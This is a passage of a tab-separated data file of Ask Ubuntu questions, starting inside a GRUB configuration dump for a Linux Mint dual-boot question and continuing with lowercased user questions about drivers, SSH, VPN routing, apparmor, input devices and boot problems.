520dfeb8-758e-47c0-97de-a0a8cb8b4866 else search -- no-floppy -- fs-uuid -- set=root 520dfeb8-758e-47c0-97de-a0a8cb8b4866 fi linux /boot/vmlinuz-3.11.0-12-generic root=uuid=520dfeb8-758e-47c0-97de-a0a8cb8b4866 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-12-generic } menuentry 'linux mint 16 cinnamon 64-bit , 3.11.0-12-generic ( /dev/sda7 ) -- recovery mode ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos7' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos7 -- hint-efi=hd0 , msdos7 -- hint-baremetal=ahci0 , msdos7 520dfeb8-758e-47c0-97de-a0a8cb8b4866 else search -- no-floppy -- fs-uuid -- set=root 520dfeb8-758e-47c0-97de-a0a8cb8b4866 fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=520dfeb8-758e-47c0-97de-a0a8cb8b4866 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/10_lupin # # # # # # end /etc/grub.d/10_lupin # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos7' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos7 -- hint-efi=hd0 , msdos7 -- hint-baremetal=ahci0 , msdos7 520dfeb8-758e-47c0-97de-a0a8cb8b4866 else search -- no-floppy -- fs-uuid -- set=root 520dfeb8-758e-47c0-97de-a0a8cb8b4866 fi linux16 /boot/memtest86+.bin } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos7' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos7 -- hint-efi=hd0 , msdos7 -- hint-baremetal=ahci0 , msdos7 520dfeb8-758e-47c0-97de-a0a8cb8b4866 else search -- no-floppy -- fs-uuid -- set=root 520dfeb8-758e-47c0-97de-a0a8cb8b4866 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( on /dev/sda2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-76c2ad13c2acd89f ' { insmod part_msdos insmod ntfs set root='hd0 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos2 -- hint-efi=hd0 , msdos2 -- hint-baremetal=ahci0 , msdos2 76c2ad13c2acd89f else search -- no-floppy -- fs-uuid -- set=root 76c2ad13c2acd89f fi chainloader +1 } menuentry 'ubuntu 13.10 ( 13.10 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-simple-5832ede3-f357-427e-ac67-b2157b5ba6e1 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 5832ede3-f357-427e-ac67-b2157b5ba6e1 else search -- no-floppy -- fs-uuid -- set=root 5832ede3-f357-427e-ac67-b2157b5ba6e1 fi linux /boot/vmlinuz-3.11.0-15-generic root=uuid=5832ede3-f357-427e-ac67-b2157b5ba6e1 ro acpi_backlight=vendor dell_laptop.backlight=0 quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-15-generic } /\/\/\/\/\/\/ there was another submenu thing for ubuntu advanced options here , also omitted /\/\/\/\/\/\/\/\ # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda7/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda7 during installation uuid=520dfeb8-758e-47c0-97de-a0a8cb8b4866 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=24a1b8d2-d3a0-4b3f-b48e-9a3f5bab16c2 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i 'm not sure if this partition setup is good or not , because i was unable to create an additional primary partition ( 4 max ) , but i figured since ubuntu could boot from within the extended partition , linux mint should be able to as well , so i added linux mint to a partition in the same extended partition as ubuntu ( which is in /dev/sda5 ) , but in its own logical partition /dev/sda7 . in the /boot/grub/grub.cfg file , there are several menuentry units . if the right way to go about booting linux mint from the grub2 menu is to just add a menuentry block for linux mint , then i 'd like to know how to do this . if there 's a better way to get each of these operating systems to have an option to be booted on startup , let me know that as well ! i saw a somewhat similar question here but it seemed a little bit different since that user did n't have two operating system partitions contained within the same extended partition , and i did n't want to just be shooting in the dark and possibly break something important by accident . if any more information is needed that i have n't given here , i 'll be keeping a close eye on this so let me know right away and i 'll do my best to provide you with whatever info you need . thank you very much for any help !
400887	when attempting to install wireless driver i get error messages	i am dealing with the sta broadcom driver i am running ubuntu 12.04 lts on a dell latitude e 5500 . it authenticates fine and in the log tells me it went successfully but when trying to install the driver i get an error message .
400888	how can i get the bash $ random in a makefile ?	this works on osx : random : = $ ( shell /bin/bash -c `` echo $ $ random '' ) test : echo $ ( random ) for cross platform random numbers i 've instead resorted to this : random : = $ ( shell od -an -n2 -i /dev/random | tr -d ' ' ) how can i get the first example to work ?
400891	error when installing bind9	i have this error when installing bind 9 : e : unable to correct problems , you have held broken packages . this is a screen-shoot : any solution ?
400893	restricting ssh sessions for accounts on ubuntu server	may someone please show me how i would restrict accounts/people logging into an ubuntu 10.04 server by ssh to a single active session at a time for each account that logs into the server . regards
400896	how to manually add os in grub ?	i have windows 8 and ubuntu 12.04 lts dual booted.. however , i have a partition with windows 7 which does not have an entry in bootloader . how can i manually edit the grub so that i can get windows 7 , 8 as well as ubuntu ?
400902	pptp vpn navigate through lan	i have a vpn set up using pptp on ubuntu server 13.10 . the network config is the following : gateway 192.168.1.1 ( internally ) vpn server 192.168.1.125 ip range for lan 192.168.1.2 - 110 ip range for vpn users 192.168.1.200 - 210 gateway is configured to forward all requests on ports used by vpn to 192.168.1.125 and this is ok . i have only one point that is not working as i 'd like : once i have established the vpn connection i 'd like to be able to navigate through the lan as i do when i am connected to the lan . what kind of routing between the two lan segments should i set up ? sorry for this newbye question but this is what i actually am on vpn networking . best regards lelio
400903	knowing the interface of ubuntu and editing them	where are the files for the desktop or the interface that appears on the screen stored ? and how can we edit them . how are they programmed ? what programming language is used to built the interfaces ?
400905	what do the numbers in parentheses near the commands mean ?	in some manuals online i see numbers in parentheses following the commands , like ( sshd ( 8 ) , ssh_config ( 5 ) , etc. ) . what does this mean , and why is it important to indicate/show the number ?
400907	activate core dumps for a specific daemon only	i have a daemon for which i want to activate core dump , but i do n't want this feature to be on for evry application in the system . is that possible ? my daemon starts automatically when the os starts thanks to a script in /etc/init.d/ written for it . are there calls that i can make there so that i can activate the core dumps specifically ? thanks .
400910	where is the udev error log located ?	i 'm trying to add some rules to udev . i 've added usb_log= '' info '' in /etc/udev/udev.conf , but i ca n't figure out where the messages end up . they used to be in syslog , did n't they ? i just installed 13.10 after a hard disk crash , so it 's a pretty clean install . so , my question is : where do messages from udev end up in ubuntu 13.10 ?
400911	changing keyboard rate for initial keypress in ubuntu ?	i currently have the settings as follows : repeat keys : delay : short ( all the way to the left ) speed : fast ( all the way to the right ) this works okay in the sense that if i press a key , it will after a few seconds , repeat quickly . the problem is , the initial keypress . if i press and hold a key , i want there to be no delay and it to immediately start repeating the key quickly ! the delay seems to be only relevant to the keypresses following the original keypress . how do i get my keypress repeat to be very fast from the very first keypress ?
400912	disabling multiple simultaenous ssh sessions	can someone please show me how to disable multiple simultaneous ssh sessions for an account on an ubuntu 10.04 server . the setup currently in place is that every account has ssh access to the server . the response given on the other question basically stated or showed how to deny users or allow the user to access the server via ssh . in the setup i have got , all users have to have ssh access , but none of them are to have duplicate ssh sessions running at the same time from a remote desktop .
400915	how to make changes in the ubuntu interface ?	suppose i want to make a change i want to change the interfaces ( battery status bar time display and username ) to the left side so how can we edit them . how are they programmed ? what programming language is used to built the interfaces ?
400916	torrents wo n't download normally on ubuntu	by not normally i mean that they will download with 100-200kb/s ( max on my net is 1mb/s ) for a few seconds , then 0kb/s and so on , always . i 've used both deluge and transmission with no luck . i want to point out that on the same computer , on windows 8 , the same torrent downloads perfectly . i 've changed ports a bit , put maximum upload limits , slots , attempts to connect but there is no improvement . i have no idea what is wrong !
400918	deactivate middle-button-paste on one specific hid	i 'm using ubuntu 12.04 on a lenovo t430s . when using an external keyboard with track-point , i observed the following unexpected behavior : when scrolling ( pressing and holding the middle mouse button and moving the track-point ) , the text i had selected last is being pasted . but this should only happen when clicking ( not holding ) the middle mouse button . the interesting thing is that this is only happening on the external keyboard , the the keyboard of the laptop is behaving correctly . furthermore , this is only happening when the track-point is used shortly after pressing the middle mouse button , it is not pasting when i wait for at least a second . googling did n't bring up anything . are there any similar experiences or a workaround i missed ? one acceptable workaround for me would be to disable the middle-button-paste on the external keyboard only , so that i can still use an external mouse to do the pasting . i only found a way to disable this feature completely on all devices , but i use this pasting feature quite and often so i can not live without it .
400919	ubuntu 13.10 boots up to black screen after install	laptop specs- intel i5 processor nvidia gt 520mx 6 gb ram 750 gb hdd after install , screen turns black and nothing happens .
400920	no route to host . how to ssh from guest machine in virtualbox to host machine by bridged adapter ?	sorry for the mistakes i 've made . i 'm trying to connect through ssh to my host machine ( ubuntu 13.10 ) from guest machine ( ubuntu server 13.10 ) which has bridged adapter . vice versa everything ok - i connect to guest just by typing ssh user @ dhcp-ip , but when i try to connect conversely i get the following : connect to host 192.168.0.x port 22 : no route to host . ip on host machine is taken from the ifconfig from eth0 . recently , i 've checked up that port 22 is listened by ssh server daemon on the host machine . what i do wrong ?
400922	error 8000 - installing ubuntu on an old pc with bootable dvd	is there an iso file with less than 700 mb ? i can not put the iso file 'ubuntu-12.04.3-desktop-i386 ' with 707 mb on cd having only 700 mb . i tried to make a bootable dvd but when booting pc says : edd : error 8000 reading sector 50 ( and then 51,52,53 etc ) and then boot failed ...
400923	ca n't access windows 7 after installing ubuntu 13.10	i had windows 8.1 beside windows 7 . i installed ubuntu 13.10 on windows 8 drive after formatting the drive . now i have windows 7 beside ubuntu the problem is that in ubuntu boot page windows 8 boot loader appear instead of win 7 , if i choose win8 there is a blue page with error `` there is n't a windows8 installed '' and to try againg press f8 and other operating system press f9 . i pressed f9 but win7 did n't been opened i tried to repair win7 with a cd but it work one time only . what can i do to repair the boot loader ?
400926	unmet dependencies errors not resolved	i got errors while trying to install openshot as follows : sudo add-apt-repository ppa : openshot.developers/ppa sudo apt-get update sudo apt-get install openshot openshot-doc i need help resolving the following unmet dependency errors : icedtea-6-plugin : depends : icedtea-netx ( = 1.2-2ubuntu1 ) but 1.2.3-0ubuntu0.12.04.3 is to be installed icedtea-6-plugin : i386 : depends : icedtea-netx : i386 ( = 1.2-2ubuntu1 ) but 1.2.3-0ubuntu0.12.04.3 is to be installed openshot : depends : gtk2-engines-pixbuf but it is not going to be installed depends : melt but it is not going to be installed depends : python-mlt5 but it is not installable or python-mlt3 but it is not going to be installed or python-mlt2 but it is not installable depends : python-pygoocanvas but it is not going to be installed recommends : frei0r-plugins but it is not going to be installed openshot-doc : depends : rarian-compat but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
400929	ethernet not connecting on boot	i recently moved my router to another pc and the back to my own and now my system wo n't start the ethernet connection automatically upon boot , i have to manually click on wired connection 1 each time . from this question network not starting up on boot i checked my /etc/network/interfaces file and it reads : auto lo iface lo inet loopback what does that mean ? should n't it read ? : auto eth0 iface eth0 inet dhcp should i change it ?
400934	problem installing software open cyc	i am currently running ubuntu 12.04.2 which was updated some 100 days ago . it is a laptop of dell inspiron 1545 series . i am getting stuck while trying to install open-cyc software when run the command of installing this software , i get following errors : - nakul @ nakul-inspiron-1545 : ~/desktop/related/opencyc-4.0/scripts $ sudo ./run-cyc.sh launching cyc server at mon jan 6 16:43:04 ist 2014 ... found a java executable . got init form : ( progn ( load `` init/jrtl-release-init.lisp '' ) ( load `` init/port-init.lisp '' ) ) got remote debugging port : 8889 got main class : com.cyc.tool.subl.jrtl.nativecode.sublisp.sublmain logging is not supported for this release ... . not using canonicalized library paths . warning : can not find required class path element plugins ... . error : cyc requires 64-bit java to load this version of the cyc kb . the java that is currently in your path is a 32-bit java . cyc server has shut down at mon jan 6 16:43:04 ist 2014 nakul @ nakul-inspiron-1545 : ~/desktop/related/opencyc-4.0/scripts $ uname -a command returns following results : - nakul @ nakul-inspiron-1545 : ~/desktop/related/m2m-atl-update-3.4.0 $ uname -a linux nakul-inspiron-1545 3.5.0-40-generic # 62~precise1-ubuntu smp fri aug 23 17:59:10 utc 2013 i686 i686 i386 gnu/linux please tell how to resolve this problem . i am already having java installed as it is evident from the below mentioned command : - nakul @ nakul-inspiron-1545 : ~/desktop/related/m2m-atl-update-3.4.0 $ whereis java java : /usr/bin/java /etc/java /usr/lib/java /usr/bin/x11/java /usr/share/java /usr/share/man/man1/java.1.gz please tell how the problem can be resolved .
400935	how can i manage multiple end-user-style localhost applications ?	over time i have installed applications that offer or require an interface runs through the browser on localhost ( for example , transmission web interface , stackapplet configuration , veracity web interface ) . i also develop software that i test via localhost . of course , all these applications must run on different ports , and if there happen to be conflicts it is up to me to resolve them by configuring the application in question . but i have no localhost `` manager '' that i could use to : require applications register themselves against ( e.g . for port allocation ) record port allocations ( if the underlying application does n't have the functionality to register itself ) start/stop the web services control port access from other machines on the network/internet other things i have n't thought of ; ) as more end-user-style applications offer web interfaces , it looks like i 'll end up running a little multi-application web server for myself . how can i ( easily ) manage this ?
400936	loop variable error in for loop	when iâm using for like for i in 1 2 3 4 5 then my file contains # ! /bin/sh at the top . but when iâm using for ( ( i = 0 ; i < =5 ; i++ ) ) then it is showing error syntax error : bad for loop variable and running properly when i remove shebang . please tell me the reason behind this .
400937	prioritize traffic from lan computers	i 'm running torrent client on my headless ubuntu server . also number of computers are connected to this server , which is used as internet gateway/router . the question is whether it 's possible to configure iptables to prioritize traffic from eth1 ( lan if ) over local traffic generated by server ? something like qos..
400941	how to login in a tty automatically after loging in gui ?	my problem is , when i switch to command line ( ctrl+alt+f1 or f2 , etc ) , i have to relogin . is there any way to automatically login in a tty ?
400942	overheating laptop ( hp pavilion g6 with amd 8 ) ubuntu 13.04	i am barely running ubuntu now because the fan is blowing like crazy , it 's blowing hot air and i estimate the temprature around 90 c / 194 f. when i run windows my laptop is n't overheating and the fan runs normal . i have no idea why my laptop is overheating while running ubuntu . i hope someone can help me because i really want a laptop with ubuntu . also when the cpu gets too hot my laptop randomly shuts down .
400943	does dual-boot negatively affect performance ?	i only have one hard disk and windows 7 is currently installed on it . i 'm considering dual-boot but i was wondering : will having ubuntu and windows at the same time with only one hdd affect my pc 's performance ?
400944	how to search for proposed updates on ubuntu.com	on packages.ubuntu.com one currently can search for ( taking precise as example ) : precise ( 12.04lts ) precise-updates precise-backports but how can one search for precise-proposed packages on-line ? ( i know that one can enable the repo locally , update synaptic and look at what changed , but i 'm looking for a more trivial solution . )
400950	grub2 entries disturbed by following ubuntu recommendation on replacing files	hardware : a desktop , a bit out of date , 2 physical hd 's ( each of which carries windows xp and ubuntu 12.04.3 ) problem : duplicate entries of grub menu on /dev/sdb when : 0600 of 2014/01/06 ( this morning ) just after following suggestion about replacing grub related files at the end of update manager 's session found : 1 . files and directories in /etc/grub.d that do not exist in the system on /dev/sda ( updating sda had no question about replacing grub 's files ) namely , ( directories ) bin and proxifiedscripts , ( files ) 10_linux_proxy and 30_os_prober_proxy 2 . entries in grub.cfg correspond to the files in /etc/grub.d and grub menu in both systems 3 . it was noticed during the update of both systems that grub-pc was downloaded and updated . questions : the situation in how to remove duplicate entries in grub menu ? is not the same as mine but very close . i 'd also rather ask questions than answer to the question . while in the question only linux entries were duplicate , i had duplication on every thing . i believe the question owner got and followed the same reccommendation about replacing grub as i did but he might have no opportunity to check with other system . the answer of the question suggested sudo update-grub2 . i did but it was not different from sudo update-grub . neither of the commands solved my problem . here are my questions : 1 . is all that happenned above the results of replacing grub files ( as recommended by ubuntu ) ? 2 . why did only /dev/sdb get a reccommendation to replace grub files while did not /dev/sda ? 3 . should removal of differences fix the problem or cause side effects ?
400953	unity-greeter black screen on 13.10	i 've recently installed ubuntu 13.10 64bit on a desktop ( uefi mode ) . after the plymouth splash i get a black screen . after some experiments i found a temporary solution : switch back to tty1 and login sudo unity-greeter get an awful error : ( unity-greeter:2109 ) : gtk-warning ** : can not open display : failed to launch bus : failed to launch session bus sudo reboot after reboot unity-greeter starts up just fine until logoff ( after graphical login a procedure to report an xorg crash starts ) i have an nvidia graphics card , i tried all drivers ( nouveau , currunt , experimental , xorg-edgers etc ) but there was no change ( with the exception of the xorg-edgers that always gave the corrupted configuration prompt , which , sadly , did n't solve a thing ) . any help/suggestion is appreciated : ) edit : after some experiments ( see comments to answers ) the problems came to be more random . at the moment it seems not to present itself when there is an xorg problem ( apport starting just after login ) but sometimes i get a clean start even when there is no error to report . i think there 's a link between `` having an xorg error '' and `` starting unity-greeter/lightdm correctly '' because i tried using a faulty mouse ( pointer stuck at boot with both win7 and ubuntu ) and in that case unity-greeter/lightdm always starts ( but of course then i have to disconnect the faulty mouse ... ) . i was asked for logs : i 'll provide them the next time the problem presents itself ( i 'll try some reboots but i do n't know when it will happen again : ( ) . i was also asked for info about hardware and configuration : lshw relevant info : *-display description : vga compatible controller product : gf116 [ geforce gt 640 oem ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:89 memory : fc000000-fdffffff memory : d0000000-d7ffffff memory : d8000000-dbffffff ioport : e000 ( size=128 ) memory : fe000000-fe07ffff lspci -v relevant info : 01:00.0 vga compatible controller : nvidia corporation gf116 [ geforce gt 640 oem ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. device 2319 flags : bus master , fast devsel , latency 0 , irq 89 memory at fc000000 ( 32-bit , non-prefetchable ) [ size=32m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at d8000000 ( 64-bit , prefetchable ) [ size=64m ] i/o ports at e000 [ size=128 ] [ virtual ] expansion rom at fe000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia xorg version : 7.7 ( apt-cache show xserver-xorg | grep version gives : version : 1:7.7+1ubuntu6 ) nvidia driver version : 331.20 ( from x-swat ppa ) uname -r : 3.11.0-15-generic i ca n't think of other info that could be needed , if you can just say so : ) edit : it has been 3 days since the last time the error presented . nothing changed in the system ( at lest not by my doing ) so i have no idea of what caused it and what solved it . thanks to everybody that helped , i 'll post updates if ( and when ) i 'll have black screen again ...
400955	how can i enable automatic resume on lid open ?	my problem is the opposite of what is described in how to prevent resume from sleep/suspend on lid open ? . if i close my laptop 's lid , it automatically suspends , but when i open it up again , nothing happens , and i have to press the power button to wake it up . how can i make my laptop wake up from suspend when i open it 's lid ? ( it 's an acer v5-171 running ubuntu 13.10 )
400957	is there a way to download something over network when it 's downloaded by another pc in the network ?	we have 4 pcs connected to each other . we all download our apps through internet which uses our internet bandwidth . is there a way to share downloaded softwares through network to prevent others from downloading the same thing through internet .
400959	ubuntu 12.04 lts iso for 64-bit intel i7-4700mq quad core laptop	i have a lenovo ideapad with intel i7-4700mq processor . which ubuntu iso should i download for installation ?
400960	instructions for flashing a phone or tablet device with ubuntu fron	i have a question . its possible to find instructions for flashing a phone or tablet device with ubuntu for sony xperia t ?
400961	u1db problems with apparmor	i 'm having problem with u1db and apparmor . the application works fine , but when it is packaged apparmor does not allow the app to save data into $ home/.local/share/.. so i ca n't actually save my settings between different executions . this is what i can read into my log ... kern.log : jan 5 23:45:38 swordfish-xps12 kernel : [ 10599.303619 ] type=1400 audit ( 1388961938.954:112 ) : apparmor= '' denied '' operation= '' mknod '' parent=8115 profile= '' com.ubuntu.developer.flscogna.ubuntu-netwalk_ubuntu-netwalk_0.9 '' name= '' /home/swordfish/.local/share/ubuntu-netwalk/ubuntu-netwalk-settings.db '' pid=13381 comm= '' ubuntu-netwalk '' requested_mask= '' c '' denied_mask= '' c '' fsuid=1000 ouid=1000 the apparmor json file is this : { '' policy_groups '' : [ `` networking '' ] , '' policy_version '' : 1 } manifest.json : { '' description '' : `` ubuntu netwalk app '' , '' framework '' : `` ubuntu-sdk-13.10 '' , '' hooks '' : { '' ubuntu-netwalk '' : { '' apparmor '' : `` ubuntu-netwalk.json '' , '' desktop '' : `` ubuntu-netwalk.desktop '' } } , '' maintainer '' : `` filippo scognamiglio < flscogna @ gmail.com > '' , '' name '' : `` com.ubuntu.developer.flscogna.ubuntu-netwalk '' , '' title '' : `` ubuntu netwalk '' , '' version '' : `` 0.9 '' } and the u1db inside the application : u1db.database { id : settingsdatabase path : `` ubuntu-netwalk-settings.db '' } u1db.document { database : settingsdatabase docid : `` settings '' create : true defaults : { `` glowing '' : `` true '' , `` difficulty '' : `` insane '' , `` roration '' : `` false '' } component.oncompleted : { var tempcontents = { } ; tempcontents = contents ; glowing = boolean ( tempcontents [ `` glowing '' ] ) ; difficulty = tempcontents [ `` difficulty '' ] ; rotation = boolean ( tempcontents [ `` rotation '' ] ) ; console.log ( json.stringify ( tempcontents ) ) ; } component.ondestruction : { var tempcontents = { } ; tempcontents [ `` glowing '' ] = string ( glowing ) ; tempcontents [ `` difficulty '' ] = string ( difficulty ) ; tempcontents [ `` rotation '' ] = string ( rotation ) ; contents = tempcontents ; console.log ( json.stringify ( tempcontents ) ) ; } } if someone has any idea why this is not working it would be really really appreciated ... thank you in advance : d
400962	intel driver seems not to be installed	00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) i already installed xserver-xorg-video-intel.however , when i check the module installed it return drm ; # basename `readlink /sys/class/graphics/fb0/device/driver/module` drm i also check the kernel source in /usr/src/headers to look for the appropriate vendor id for the above device 02.0 and 02.01 . but i could n't find any . the screen problem is that whenever i open a gui application , the screen jumps with plenty of dots appearing on the screen . how can i solve this problem ?
400964	what can i do with a low and old spec computer ?	i just rebuilt a computer , 512 mbs of ram,180gb , intel pentium 3 , should i install xubuntu ? would it make it any faster ? i would like to use it for basic browsing , homework , all of that mostly online/in the cloud . thanks for your answers in advance .
400966	ubuntu one client for android	with android 4.4 there are new functionality of saving , viewing , and editing documents on cloud storage . i 'm able to do all this in one contextual menu . google drive and dropbox shows up , but sadly ubuntu one does not . will it be update to take advantage of this new feature ?
400972	ubuntu and epson c67	i have a pc with windows 8 and a printer epson c67 . the driver is outdated for windows 8 . i want to know if is possible to use the printer with ubuntu and what i have to do .
400974	amd underscan on cli	so i installed ubuntu 13.04 minimal from a server installation . cli worked fine , and i added xorg and xbmc so i could have a cli server , but the option to start x and login using xbmc-live . i have an hd5450 gfx , which had no issues on cli . i installed the proprietary drivers from amd 's site and started x , xbmc , which underscanned on my philips 23 '' monitor . i dropped to terminal , ran sudo aticonfig -- set-pcs-val=mcil , digitalhdtvdefaultunderscan,0 and rebooted . now cli interface , before i start x , is underscanning , but when in x/xbmc it works perfectly . any suggestions on how to fix this or why this would be ? i have scoured the internet and tried re-installing x/drivers and clearing settings and xorg.conf to no avail .
400975	some icons/symbols in texstudio are missing	just installed texstudio on xubuntu 13.10 ( the theme is numix ) and there are lots of icons/symbols missing . is it rather related to texstudio or because of the the theme ? if the latter , what do i have to do to make it work ? i 'd rather stay with numix .
400976	can you use variables when setting up restrictions on addresses that ssh server listens on ?	i am setting up some virtual ubuntu 12.04 servers and was wondering if you could use a variable or a string that represented the ip or interface ? i was trying to make a template that could be used to spin up new copies of the original and wasnt sure if ubuntu supported that , such as eth0 or eth1 instead of 10.x.x.x thank you
400978	how to get virtual console when alt+ctrl+f1-f6 not working ?	i wanted to install jre latest . when i had java ( tm ) ... so i purged java* next time , i restart the system , i get a login screen . but after passwd given , it says failed to load session ubuntu . i looked at the suggestions to this problem ... in many places , first it requires a virtual console using alt+ctrl+f1-f6 ( keys ) . but i only get a black screen with nothing on it . hence my question . any help would be much much appreciated .
400979	how to change gtk.notebook tabs	there is a way to change the default gtk.notebook tab ? i want to realize a flat tab button
400980	unable to browse internet as it needs to be authenticate via server reachable via ie 5 or above	i have recently installed ubuntu ( ubuntu-13.10-desktop-amd64 ) , the problem is that i have a dsl connection ( wired connection ) which need to authenticate via server and this server can be reached via ie5 ( internet explorer 5 ) or above . i 'm running windows 7 along with ubuntu . please suggest how i do install internet explorer there ... .i have tried searching for downloading file from the internet but could n't find any for ubuntu ... please help ! ! thanks and regards ,
400983	connecting to samsung sch-u340 phone using gammu	i have an old samsung sch-u340 mobile phone , which once connected to a pc using a usb cable . the phone has no sim card , and apparently stores its phonebook inside the phone 's rom . i want to get my phonebook backed up as a file on an ubuntu precise 12.04 machine . i have installed gammu ( and wammu ) and am trying to get the ubuntu machine to connect to the phone . using lsusb i can see the phone in device /dev/ttyacm0 , which is similar to what gammu-detect gives me . i am using this configuration : [ gammu ] device = /dev/ttyacm0 connection = at but gammu -- identify gives me function not supported by phone . is there a way around this , or do i need a completely different direction ?
400985	how to use ori file sysstem on ubuntu	how to use the new ori file system on ubuntu ? are there any documentations ?
400988	how can scrolling when the middle clickpad button is pressed be enabled ?	i have a lenovo thinkpad yoga which is equipped with a clickpad . i want to enable scrolling using the middle clickpad button . so , i want to be able to scroll in , say , an editor by pressing and holding the middle button and then moving the mouse in the direction in which to scroll . i have set up this clickpad such that the three soft buttons corresponding to mouse buttons 1 , 2 and 3 are recognised . the synaptics configuration is as follows : section `` inputclass '' identifier `` default clickpad buttons '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 64 % 0 1 42 % 36 % 64 % 1 42 % '' option `` areabottomedge '' `` 1 '' endsection the xinput device listing ( xinput -- list ) is as follows : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ elan touchscreen id=9 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 ec pen stylus id=11 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 ec pen eraser id=15 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=16 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ integrated camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=14 [ slave keyboard ( 3 ) ] the xinput properties listing for the pointing stick device ( xinput -- list-props `` tpps/2 ibm trackpoint '' ) is as follows : device 'tpps/2 ibm trackpoint ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 262 ) : 0 device accel constant deceleration ( 263 ) : 1.000000 device accel adaptive deceleration ( 264 ) : 1.000000 device accel velocity scaling ( 265 ) : 10.000000 device product id ( 251 ) : 2 , 10 device node ( 252 ) : `` /dev/input/event15 '' evdev axis inversion ( 266 ) : 0 , 0 evdev axes swap ( 268 ) : 0 axis labels ( 269 ) : `` rel x '' ( 144 ) , `` rel y '' ( 145 ) button labels ( 270 ) : `` button left '' ( 137 ) , `` button middle '' ( 138 ) , `` button right '' ( 139 ) , `` button wheel up '' ( 140 ) , `` button wheel down '' ( 141 ) , `` button horiz wheel left '' ( 142 ) , `` button horiz wheel right '' ( 143 ) evdev middle button emulation ( 271 ) : 0 evdev middle button timeout ( 272 ) : 50 evdev third button emulation ( 273 ) : 